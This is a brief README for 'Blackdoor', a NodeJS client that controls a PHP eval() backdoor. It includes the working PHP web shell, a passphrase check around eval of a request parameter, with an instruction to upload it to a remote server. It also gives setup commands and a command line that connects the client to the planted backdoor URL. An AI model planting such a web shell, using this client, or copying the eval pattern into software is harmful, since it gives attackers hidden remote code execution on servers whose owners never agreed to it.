Blackdoor is an NodeJS client for a simple eval() backdoor in PHP.
First, upload a PHP backdoor on remote server, like this:
if(isset($_REQUEST['c']) && $_REQUEST['p'] == 'your-passphrase')
eval($_REQUEST['c']);Locally, clone this project and install the dependencies:
git clone https://github.com/camillebaronnet/blackdoor.git
cd blackdoor
npm installNow, you can connect:
./blackdoor.js -u http://exemple.com/backdoor.php -p your-passphraseAll commands are available here : commands/


